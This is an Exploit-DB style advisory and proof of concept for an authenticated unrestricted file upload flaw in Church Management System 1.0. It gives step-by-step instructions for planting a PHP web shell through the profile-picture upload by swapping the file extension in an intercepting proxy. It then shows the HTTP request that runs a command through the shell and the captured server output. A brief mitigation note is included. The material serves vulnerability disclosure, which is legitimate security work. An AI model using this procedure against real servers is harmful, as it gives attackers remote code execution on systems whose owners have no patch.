Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)

vendor:

Church Management System

by:

Murat DEMIRCI

8,8

CVSS

HIGH

Unrestricted File Upload to Remote Code Execution

434

CWE

Product Name: Church Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:church_management_system:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 10

2021

Church Management System 1.0 – Unrestricted File Upload to Remote Code Execution (Authenticated)

An authenticated user can upload a malicious file to the Church Management System 1.0, which can be used to execute arbitrary code on the server. To exploit this vulnerability, an attacker must first login to any user account and change the profile picture. Then, the attacker can upload any PHP shell by altering its extension to .jpg or .png (e.g. test.php.jpg). Before uploading the file, the attacker must intercept the traffic using a proxy. The attacker can then change the test.php.jpg file to test.php and click forward. Finally, the attacker can find the test.php file path and execute any command.

Mitigation:

The best way to mitigate this vulnerability is to restrict the types of files that can be uploaded to the server. Additionally, the server should be configured to only allow certain file extensions, and any files that are uploaded should be scanned for malicious content.

Source

Exploit-DB raw data:

# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# CVE : N/A

# Proof of Concept :

1- Login any user account and change profile picture.
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)
3- Before uploading your file, intercept your traffic by using any proxy.
4- Change test.php.jpg file to test.php and click forward.
5- Find your test.php file path and try any command.


###################### REQUEST ##########################################

GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/cman/members/dashboard.php
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc

####################### RESPONSE #########################################

HTTP/1.1 200 OK
Date: Sat, 03 Jul 2021 11:28:16 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
X-Powered-By: PHP/8.0.3
Content-Length: 4410
Connection: close
Content-Type: text/html; charset=UTF-8


Host Name:                 MRT
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19043 N/A Build 19043
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Murat  
System Boot Time:          6/25/2021, 2:51:40 PM
System Manufacturer:       Dell Inc.
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.


############################################################################